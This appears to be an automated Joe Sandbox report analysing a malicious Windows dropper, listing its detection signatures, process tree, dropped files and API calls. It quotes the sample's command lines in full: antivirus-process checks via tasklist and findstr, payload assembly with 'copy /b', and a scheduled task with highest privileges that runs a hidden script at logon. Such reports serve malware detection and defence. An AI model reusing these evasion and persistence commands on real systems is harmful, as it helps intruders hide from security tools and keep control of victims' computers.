Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1458478
MD5:814ff8b10d8641b03fcf1e9efc1005bf
SHA1:25cb52ef822cf0077a11278d936569ed5f5d92d4
SHA256:976137409e5d45839870a834b4b06bd46495a39d216bb0f31f1f0370fe1b5d94
Tags:exe
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Wscript called in batch mode (surpress errors)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 814FF8B10D8641B03FCF1E9EFC1005BF)
    • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7568 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7608 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7616 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7652 cmdline: cmd /c md 812297 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7668 cmdline: findstr /V "IndieBeachesHonIo" Janet MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7684 cmdline: cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Shopzilla.pif (PID: 7700 cmdline: 812297\Shopzilla.pif 812297\g MD5: B06E67F9767E5023892D9698703AD098)
        • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7716 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 7792 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MindTechPro360.pif (PID: 7836 cmdline: "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif" "C:\Users\user\AppData\Local\TechMind360 Innovations Co\L" MD5: B06E67F9767E5023892D9698703AD098)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 812297\Shopzilla.pif 812297\g, ParentImage: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, ParentProcessId: 7700, ParentProcessName: Shopzilla.pif, ProcessCommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7740, ProcessName: schtasks.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", ProcessId: 7792, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 812297\Shopzilla.pif 812297\g, CommandLine: 812297\Shopzilla.pif 812297\g, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7472, ParentProcessName: cmd.exe, ProcessCommandLine: 812297\Shopzilla.pif 812297\g, ProcessId: 7700, ProcessName: Shopzilla.pif
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 812297\Shopzilla.pif 812297\g, ParentImage: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, ParentProcessId: 7700, ParentProcessName: Shopzilla.pif, ProcessCommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7740, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd, ProcessId: 7472, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 812297\Shopzilla.pif 812297\g, ParentImage: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif, ParentProcessId: 7700, ParentProcessName: Shopzilla.pif, ProcessCommandLine: schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7740, ProcessName: schtasks.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js", ProcessId: 7792, ProcessName: wscript.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7472, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7616, ProcessName: findstr.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C047B7 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C047B7
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C03B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C03B4F
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C03E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C03E72
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00C0C16C
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0CB81 FindFirstFileW,FindClose,10_2_00C0CB81
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00C0CC0C
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C0F445
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C0F5A2
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00C0F8A3
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F47B7 GetFileAttributesW,FindFirstFileW,FindClose,15_2_006F47B7
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3E72
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FC16C
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FCB81 FindFirstFileW,FindClose,15_2_006FCB81
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FCC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_006FCC0C
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF445
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF5A2
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FF8A3
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3B4F
Source: unknownDNS traffic detected: query: JzyWtlVaDZyw.JzyWtlVaDZyw replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C1279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_00C1279E
Source: global trafficDNS traffic detected: DNS query: JzyWtlVaDZyw.JzyWtlVaDZyw
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://crl.globalsign.net/root.crl0
Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000000.1737134126.0000000000C68000.00000002.00000001.01000000.00000005.sdmp, MindTechPro360.pif, 0000000F.00000002.2941852709.0000000000758000.00000002.00000001.01000000.00000008.sdmp, Halloween.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drString found in binary or memory: https://www.globalsign.com/repository/03
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C14614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00C14614
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_00704614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00704614
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C14416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00C14416
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C00374 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00C00374
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C2CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00C2CEDF
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0071CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_0071CEDF

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Acoustic entropy: 7.99903860979Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Do entropy: 7.99828405938Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Gnome entropy: 7.99307602247Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Ready entropy: 7.99833337336Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Predict entropy: 7.99792045824Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bee entropy: 7.99614213934Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Sandra entropy: 7.9989156064Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Praise entropy: 7.99907507657Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Almost entropy: 7.99894390583Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Random entropy: 7.99621260001Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Wright entropy: 7.99888955333Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Shannon entropy: 7.99469915151Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bb entropy: 7.99924202624Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Extreme entropy: 7.999072405Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Dot entropy: 7.99842475993Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\812297\g entropy: 7.99990971854Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifFile created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\L entropy: 7.99990971854Jump to dropped file

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js"
